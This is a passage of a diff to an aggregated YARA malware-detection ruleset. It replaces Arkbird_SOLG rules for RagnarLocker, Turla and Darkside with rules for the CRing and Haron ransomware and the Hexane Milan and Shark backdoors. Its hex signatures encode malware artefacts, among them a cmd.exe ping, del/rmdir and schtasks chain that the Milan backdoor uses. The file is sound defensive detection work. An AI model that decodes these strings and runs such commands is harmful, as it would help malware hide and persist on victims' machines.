 	strings:
-		$s1 = { 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 29 }
-		$s2 = "$version" fullword ascii
-		$s3 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 }
-		$s4 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 5d }
-		$s5 = { 63 6c 61 73 73 69 64 3d 27 63 6c 73 69 64 3a 44 32 37 43 44 42 36 45 2d 41 45 36 44 2d 31 31 63 66 2d 39 36 42 38 2d 34 34 34 35 35 33 35 34 30 30 30 30 27 }
-		$s6 = { 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 }
-		$s7 = { 22 64 61 74 61 22 2c 22 2f 6c 6f 67 6f 2e 73 77 66 22 }
-		$s8 = { 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 30 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 2b 28 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 31 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 }
+		$seq1 = { 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 4c 8b 15 [2] 02 00 41 8b c0 4c 33 15 [2] 02 00 74 03 49 ff e2 83 e0 01 4c 8b ca 41 83 e0 02 8b d0 48 ff 25 [2] 01 00 cc cc cc 4c 8b 15 [2] 02 00 4c 33 15 [2] 02 00 74 03 49 ff e2 48 ff 25 [2] 01 00 cc cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 07 48 83 c4 28 48 ff e0 b9 78 00 00 00 ff 15 [2] 01 00 32 c0 48 83 c4 28 c3 cc cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 33 c0 c3 cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 }
+		$seq2 = { 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 30 33 ff 48 8b da 48 8b f1 48 85 c9 75 18 e8 69 0c 00 00 bb 16 00 00 00 89 18 e8 b1 38 00 00 8b c3 e9 a7 00 00 00 48 85 d2 74 e3 e8 a8 3f 00 00 41 bf 01 00 00 00 85 c0 75 0c ff 15 [2] 01 00 85 c0 41 0f 44 ff 83 64 24 28 00 48 83 23 00 48 83 64 24 20 00 41 83 c9 ff 4c 8b c6 33 d2 8b cf ff 15 [2] 01 00 48 63 e8 85 c0 75 11 ff 15 [2] 01 00 8b c8 e8 b2 0b 00 00 33 c0 eb 4f 48 8b cd 48 03 c9 e8 e3 07 00 00 48 89 03 48 85 c0 74 e9 41 83 c9 ff 4c 8b c6 33 d2 8b cf 89 6c 24 28 48 89 44 24 20 ff 15 [2] 01 00 85 c0 75 1b ff 15 [2] 01 00 8b c8 e8 70 0b 00 00 48 8b 0b e8 ?? f3 ff ff 48 83 23 00 eb b0 41 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 40 33 ff 48 8b da 48 8b f1 }
+		$seq3 = { ff 25 00 00 00 00 00 00 00 00 00 00 00 00 cc }
+		$seq4 = "InitSvc" fullword ascii
 
 	condition:
-		filesize > 5KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of them
 }
-rule ARKBIRD_SOLG_Ran_Mem_Ragnarlocker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Cring_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect memory artefacts of the Ragnarlocker ransomware (Nov 2020)"
+		description = "Detect CRing ransomware"
 		author = "Arkbird_SOLG"
-		id = "910774ab-9ad6-5c56-a921-203f61c9d7f7"
-		date = "2020-11-26"
-		modified = "2020-11-27"
+		id = "3648494d-8c27-5767-90e8-45e294aac382"
+		date = "2021-04-08"
+		modified = "2021-04-09"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L3-L33"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-08/CRing/RAN_CRing_Apr_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "2cb26677b8f4e464750eb8dec0638fd3f9a28500e68f64d62e99236c93895c85"
-		score = 75
-		quality = 50
+		logic_hash = "d82db146c9048391d79bda6cc5913363fc3cfc1a7cca26b23b362b7f3563ef3c"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "041fd213326dd5c10a16caf88ff076bb98c68c052284430fba5f601023d39a14"
-		hash2 = "dd79b2abc21e766fe3076038482ded43e5069a1af9e0ad29e06dce387bfae900"
+		hash1 = "274ef2fba8ba46187f9cf462a02de286ea23ec75d163af01088f6856944817eb"
+		hash2 = "f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8"
+		hash3 = "ebb528207b2fc06a6bc89e9d430bcdfe254f0838b0f4660f67cc6bd1ebc193be"
+		level = "Experimental"
 
 	strings:
-		$s1 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
-		$s2 = "bootfont.bin" fullword wide
-		$s3 = "bootsect.bak" fullword wide
-		$s4 = "bootmgr.efi" fullword wide
-		$s5 = "---RAGNAR SECRET---" fullword ascii
-		$s6 = "Mozilla"
-		$s7 = "Internet Explorer" fullword wide
-		$s8 = "  </trustInfo>" fullword ascii
-		$s9 = "Tor browser" fullword wide
-		$s10 = "Opera Software" fullword wide
-		$s11 = "---END RAGN KEY---" fullword ascii
-		$s12 = "---BEGIN RAGN KEY---" fullword ascii
-		$s13 = "%s-%s-%s-%s-%s" fullword wide
-		$s14 = "$Recycle.Bin" fullword wide
-		$s15 = "***********************************************************************************" fullword ascii
-		$s16 = "K<^_[]" fullword ascii
-		$s17 = "SD;SDw" fullword ascii
-		$s18 = "Windows.old" fullword wide
-		$s19 = "iconcache.db" fullword wide
+		$str1 = { 1b 30 03 00 4a 00 00 00 03 00 00 11 02 73 23 00 00 0a 0a 06 6f 24 00 00 0a 2d 3a 02 72 [1-4] 00 00 70 28 25 00 00 0a 0b 72 [1-4] 00 00 70 02 28 25 00 00 0a 28 1a 00 00 0a 06 6f 26 00 00 0a 07 7e 01 00 00 04 28 05 00 00 06 2c 06 06 6f 27 00 00 0a de 03 26 de 00 2a 00 00 01 10 00 00 00 00 1b 00 2b 46 00 03 13 00 00 01 }
+		$str2 = { 1b 30 05 00 1a 01 00 00 04 00 00 11 16 0a 73 28 00 00 0a 0b 07 6f 29 00 00 0a 1e 5b 8d 2c 00 00 01 0c 07 6f 2a 00 00 0a 1e 5b 8d 2c 00 00 01 0d 73 2b 00 00 0a 13 06 11 06 08 6f 2c 00 00 0a 11 06 09 6f 2c 00 00 0a de 0c 11 06 2c 07 11 06 6f 12 00 00 0a dc 08 8e 69 09 8e 69 58 8d 2c 00 00 01 13 04 08 11 04 08 8e 69 28 2d 00 00 0a 09 16 11 04 08 8e 69 09 8e 69 28 2e 00 00 0a 11 04 04 28 06 00 00 06 13 04 11 04 8e 69 28 2f 00 00 0a 13 05 07 08 09 6f 30 00 00 0a 13 07 02 19 73 31 00 00 0a 13 08 03 18 73 31 00 00 0a 13 09 11 09 11 07 17 73 32 00 00 0a 13 0a 11 09 11 05 16 11 05 8e 69 6f 33 00 00 0a 11 09 11 04 16 11 04 8e 69 6f 33 00 00 0a 11 08 11 0a 20 [4] 6f 34 00 00 0a de 30 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 09 2c 07 11 09 6f 12 00 00 0a dc 11 08 2c 07 11 08 6f 12 00 00 0a dc 11 07 2c 07 11 07 6f 12 00 00 0a dc 17 0a de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 2a 00 00 41 94 00 00 02 00 00 00 2b 00 00 00 12 00 00 00 3d 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 ae 00 00 00 2c 00 00 00 da 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a2 00 00 00 44 00 00 00 e6 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 99 00 00 00 59 00 00 00 f2 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 90 00 00 00 6e 00 00 00 fe 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 08 00 00 00 06 01 00 00 0e 01 00 00 0a 00 00 00 00 00 00 00 }
+		$str3 = { 1b 30 03 00 24 00 00 00 05 00 00 11 73 35 00 00 0a 0a 06 03 6f 36 00 00 0a 06 02 17 6f 37 00 00 0a 0b de 0a 06 2c 06 06 6f 12 00 00 0a dc 07 2a 01 10 00 00 02 00 06 00 12 18 00 0a 00 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 12 of them
+		uint16( 0 ) == 0x5a4d and filesize > 5KB and 2 of them
 }
-
-rule ARKBIRD_SOLG_Ran_Cert_Ragnarlocker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Haron_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect certificates and VMProtect used for the Ragnarlocker ransomware (Nov 2020)"
+		description = "Detect Haron locker"
 		author = "Arkbird_SOLG"
-		id = "85d51804-eebd-5353-8bd9-01756e7f7d07"
-		date = "2020-11-26"
-		modified = "2020-11-27"
+		id = "5900ad0e-66ca-5127-b8c2-cc23ace8929f"
+		date = "2021-08-09"
+		modified = "2021-08-09"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L35-L55"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-09/RAN_Haron_Aug_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "8171128426b48102457f5ba0771b27aaf5f4562293aff04c256bd5bd721a908e"
-		score = 50
+		logic_hash = "5001041d9bb8acc0fa5e0e3b4cfacc5a891bed6885101ae3513b5524c91c572d"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		level = "Experimental"
-		hash1 = "afab912c41c920c867f1b2ada34114b22dcc9c5f3666edbfc4e9936c29a17a68"
-		hash2 = "9416e5a57e6de00c685560fa9fee761126569d123f62060792bf2049ebba4151"
+		hash1 = "66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2"
+		hash2 = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c"
+		tlp = "white"
+		adversary = "Haron"
 
 	strings:
-		$vmp0 = { 2E 76 6D 70 30 00 00 00 }
-		$vmp1 = { 2E 76 6D 70 31 00 00 00 }
+		$s1 = { 02 17 8d ?? 00 00 01 [2] 16 20 [2] 00 00 20 00 ?? 00 00 [1-5] 73 [2] 01 00 0a a2 ?? 7d ?? 01 00 0a }
+		$s2 = { 03 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 }
+		$s3 = { 1f 38 16 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 13 07 7e ?? 01 00 0a 13 0b 11 07 11 0b 11 06 6e 1f 60 6a d7 88 20 00 30 00 00 1f 40 28 ?? 00 00 06 28 ?? 01 00 0a b8 13 08 11 07 02 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 28 ?? 01 00 0a b8 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 84 b8 13 09 11 07 02 7e }
+		$s4 = { 1f 18 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 0a 7e ?? 01 00 0a 0b 06 07 28 ?? 01 00 0a 0c 08 2c 04 07 0d 2b 6f 12 04 fe 15 ?? 00 00 02 12 04 11 04 28 ?? 00 00 2b b8 7d ?? 00 00 04 06 12 04 28 ?? 00 00 06 0c 08 2c 4a 12 04 7c ?? 00 00 04 28 ?? 01 00 0a 20 ff ff ff 7f 6a fe 02 16 fe 01 13 05 11 05 2c 17 03 12 04 7b ?? 00 00 04 17 28 ?? 01 00 0a 16 fe 01 13 06 11 06 2d 0c 06 12 04 28 ?? 00 00 06 2d c2 2b 0a 12 04 7b ?? 00 00 04 0d 09 2a 07 0d 09 2a }
+		$s5 = { 28 0e 00 00 0a 0b 16 0c 38 84 01 00 00 07 08 9a 0a 06 6f ?? 01 00 0a 20 00 00 80 0c 6a 3e 66 01 00 00 06 6f 0d 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 28 21 00 00 0a 39 4c 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 2d 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 0e 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a ef 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a d0 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a b1 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 92 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 76 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 5a 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 3e 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 22 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 06 06 6f 26 00 00 0a de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 73 fe ff ff 20 c4 09 00 00 28 18 00 00 0a dd 57 fe ff ff 26 dd 51 fe ff ff }
+		$s6 = { 7e ?? 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 6f [2] 00 0a 0a 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f [2] 00 0a 06 6f ?? 00 00 0a de 03 26 de 00 2a }
+		$s7 = { 28 ?? 00 00 06 0a 02 06 28 ?? 00 00 06 0b 07 6f [2] 00 0a 16 16 17 20 ff 0f 1f 00 17 14 73 [2] 00 0a 16 14 73 [2] 00 0a 6f [2] 00 0a 02 06 07 28 ?? 00 00 06 de 03 26 de 00 2a 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 5000KB and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and pe.signatures [ i ] . serial == "68:65:29:4f:67:f0:c3:bb:2e:19:1f:75" ) and $vmp0 in ( 0x100 .. 0x300 ) and $vmp1 in ( 0x100 .. 0x300 )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 6 of ( $s* )
 }
 rule ARKBIRD_SOLG_RAN_PYSA_Sept_2021_1 : FILE
 {
@@ -156360,1037 +155852,1170 @@ rule ARKBIRD_SOLG_UNK_DEV_0322_Jul_2021_1 : CVE_2021_35211 FILE
 	condition:
 		filesize > 1KB and filesize < 15KB and all of ( $obj* ) and all of ( $arg* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Turla_Ironpython_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Milan_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect IronPython script used by Turla group"
+		description = "Detect Milian backdoor used by Hexane group (aka Siamesekitten)"
 		author = "Arkbird_SOLG"
-		id = "303929d4-2c43-5e43-aeb0-09f469f7091b"
-		date = "2021-04-30"
-		modified = "2021-05-01"
-		reference = "https://twitter.com/DrunkBinary/status/1388332507695919104"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Turla/APT_Turla_IronPython_Apr_2021_1.yara#L1-L26"
+		id = "34acac5a-6090-5a68-9afb-4da7073bed58"
+		date = "2021-08-18"
+		modified = "2021-08-19"
+		reference = "https://www.clearskysec.com/siamesekitten/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Milan_Aug_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "f6b626cddb4832f842a15eddce705fb24125e4341c425cf27dbbe537e2a98bdc"
+		logic_hash = "bad8ae2a9275bcb6e0e903fda6a128a1bed676c8e1a8e653e9fc3467766ce7fc"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		hash1 = "65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361"
-		hash2 = "c430ebab4bf827303bc4ad95d40eecc7988bdc17cc139c8f88466bc536755d4e"
-		hash3 = "f76257749792cc4e54f75d0e7a83e7a4429395c5dbc48078a8068575d7e9a98"
+		hash1 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
+		hash2 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
 		tlp = "White"
-		adversary = "Turla"
+		adversary = "Hexane"
 
 	strings:
-		$s1 = { 6c 61 6d 62 64 61 20 73 2c 6b 3a 27 27 2e 6a 6f 69 6e 28 5b 63 68 72 28 28 6f 72 64 28 63 29 5e 6b 29 25 30 78 31 30 30 29 20 66 6f 72 20 63 20 69 6e 20 73 5d 29 }
-		$s2 = { 66 72 6f 6d 20 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 20 69 6d 70 6f 72 74 2a }
-		$s3 = { 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 28 4b 65 79 53 69 7a 65 3d 31 32 38 2c 42 6c 6f 63 6b 53 69 7a 65 3d 31 32 38 29 }
-		$s4 = { 72 65 74 75 72 6e 20 53 79 73 74 65 6d 2e 41 72 72 61 79 5b 53 79 73 74 65 6d 2e 42 79 74 65 5d 28 5b 6f 72 64 28 78 29 66 6f 72 20 78 20 69 6e 20 6c 69 73 74 28 73 74 72 29 5d 29 }
-		$s5 = { 53 79 73 74 65 6d 2e 41 72 72 61 79 2e 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 53 79 73 74 65 6d 2e 42 79 74 65 2c [10-12] 2e 4c 65 6e 67 74 68 29 }
-		$s6 = { 28 62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 [4-10] 5b 31 36 3a 5d 29 2c 73 79 73 2e 61 72 67 76 5b 31 5d 2c [4-10] 5b 3a 31 36 5d 2c }
-		$s7 = { 41 73 73 65 6d 62 6c 79 2e 4c 6f 61 64 28 }
-		$s8 = { 20 69 66 20 6c 65 6e 28 73 79 73 2e 61 72 67 76 29 21 3d 32 3a }
-		$s9 = { 65 78 63 65 70 74 20 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 45 78 63 65 70 74 69 6f 6e 20 61 73 20 65 78 3a }
-		$s10 = { 69 66 20 5f 5f 6e 61 6d 65 5f 5f 3d 3d }
-		$s11 = { 2e 66 6f 72 6d 61 74 28 65 78 2e 4d 65 73 73 61 67 65 2c 65 78 2e 53 74 61 63 6b 54 72 61 63 65 29 29 }
+		$c1 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 64 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 77 00 61 00 69 00 74 00 66 00 6f 00 72 00 20 00 61 00 20 00 34 00 20 00 26 00 20 00 63 00 6f 00 70 00 79 00 20 00 22 00 25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 52 00 75 00 6e 00 20 00 2f 00 54 00 4e 00 20 00 22 }
+		$c2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 72 00 6d 00 64 00 69 00 72 00 20 00 2f 00 73 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00 6e }
+		$s1 = { 2d 2d 2d 2d 2d 2d [1-8] 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f }
+		$s2 = { 5b 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 28 00 25 00 64 00 29 00 5d }
+		$s3 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 6d 00 75 00 6c 00 74 00 69 00 70 00 61 00 72 00 74 00 2f 00 66 00 6f 00 72 00 6d 00 2d 00 64 00 61 00 74 00 61 00 3b 00 20 00 62 00 6f 00 75 00 6e 00 64 00 61 00 72 00 79 00 3d 00 2d 00 2d 00 2d 00 2d}
+		$s4 = { 8d 8d 7c ee ff ff 51 6a 00 6a 00 50 ff 15 ?? b2 4b 00 85 c0 0f 84 a9 0f 00 00 8d 85 e0 fb ff ff 50 e8 ?? e0 ff ff 59 50 8d 85 e0 fb ff ff 50 8d 4b 20 e8 [2] 00 00 6a 00 ff b5 94 ee ff ff 8d 85 e0 fb ff ff 50 ff 33 ff 15 ?? b2 4b 00 8b d0 89 95 e8 ee ff ff 85 d2 0f 84 65 0f 00 00 6a 02 5e 33 c9 b8 00 00 80 00 39 b5 88 ee ff ff 0f 44 c8 83 bd 94 ef ff ff 08 51 8d 85 80 ef ff ff 0f 43 85 80 ef ff ff 33 c9 51 51 51 ff b5 a8 ee ff ff 50 52 ff 15 ?? b2 4b 00 8b f0 89 b5 48 ef ff ff 85 f6 0f 84 fb 0e 00 00 80 7b 04 00 8b 3d ?? b2 4b 00 75 23 6a 02 58 39 85 88 ee ff ff 75 18 6a 04 8d 85 20 ef ff ff c7 85 20 ef ff ff 00 31 00 00 50 6a 1f 56 ff d7 c6 85 47 ef ff ff 00 33 c9 c7 85 f0 ee ff ff 18 00 00 00 8b c1 41 89 8d 20 ef ff ff 83 f8 03 0f 83 88 0e 00 00 83 bb d8 00 00 00 00 76 31 8d 83 c8 00 00 00 83 78 14 08 72 02 8b 00 68 00 00 00 01 ff b3 d8 00 00 00 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 00 00 00 8d b3 a8 00 00 00 83 7e 10 00 76 7a 68 ?? b9 4c 00 8d 8d 98 ef ff ff e8 [2] 00 00 6a ff 33 c0 8d 8d 98 ef ff ff 6a 00 40 56 88 45 fc e8 [2] 00 00 83 bd ac ef ff ff 08 8d 85 98 ef ff ff 8b b5 48 ef ff ff 0f 43 85 98 ef ff ff 68 00 00 00 01 ff b5 a8 ef ff ff 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 }
+		$s5 = { 6a 00 ff b5 40 ef ff ff ff b3 88 01 00 00 ff 15 30 b0 4b 00 50 57 6a ff 56 8b b5 48 ef ff ff 56 ff 15 ?? b2 4b 00 85 c0 0f 85 b2 02 00 00 8d bd 00 ef ff ff ab ab ab ab 8d 85 00 ef ff ff 50 ff 15 ?? b2 4b 00 85 c0 0f 84 74 02 00 00 8b 95 04 ef ff ff 85 d2 0f 84 4f 01 00 00 33 c0 8d bd b8 ee ff ff 6a 06 59 f3 ab 83 a5 c8 ee ff ff 00 8d bd f4 ee ff ff 83 a5 c4 ee ff ff 00 40 89 85 bc ee ff ff 89 85 cc ee ff ff 33 c0 ab c7 85 b8 ee ff ff 03 00 00 00 89 95 c0 ee ff ff ab ab 8d 43 08 83 }
 
 	condition:
-		filesize > 100KB and 9 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 15KB and 1 of ( $c* ) and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Darkside_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Shark_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of Darkside ransomware"
+		description = "Detect Shark backdoor used by Hexane group (aka Siamesekitten)"
 		author = "Arkbird_SOLG"
-		id = "10c0ba57-d6d6-5d1d-bd2a-f6f240d71f8b"
-		date = "2021-05-01"
-		modified = "2021-05-02"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1388301138437578757"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Darkside/RAN_ELF_Darkside_Apr_2021_1.yara#L1-L23"
+		id = "881dcdd9-2f4d-51d3-b046-15cdb2a2cb55"
+		date = "2021-08-18"
+		modified = "2021-08-19"
+		reference = "https://www.clearskysec.com/siamesekitten/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Shark_Aug_2021_1.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "510932893e1e81d6c88e86c7ae2345460b397c936336c7e1a33799dbc1dd6aab"
+		logic_hash = "c14abb839f4af81a3db38719f23c47498d577a779950e66978ff14d015043490"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "984ce69083f2865ce90b48569291982e786980aeef83345953276adfcbbeece8"
-		hash2 = "9cc3c217e3790f3247a0c0d3d18d6917701571a8526159e942d0fffb848acffb"
-		hash3 = "c93e6237abf041bc2530ccb510dd016ef1cc6847d43bf023351dce2a96fdc33b"
+		hash1 = "89ab99f5721b691e5513f4192e7c96eb0981ddb6c2d2b94c1a32e2df896397b8"
+		hash2 = "f6ae4f4373510c4e096fab84383b547c8997ccf3673c00660df8a3dc9ed1f3ca"
+		hash3 = "44faf11719b3a679e7a6dd5db40033ec4dd6e1b0361c145b81586cb735a64112"
+		hash4 = "2f2ef9e3f6db2146bd277d3c4e94c002ecaf7deaabafe6195fddabc81a8ee76c"
 		tlp = "White"
-		adversary = "-"
+		adversary = "Hexane"
 
 	strings:
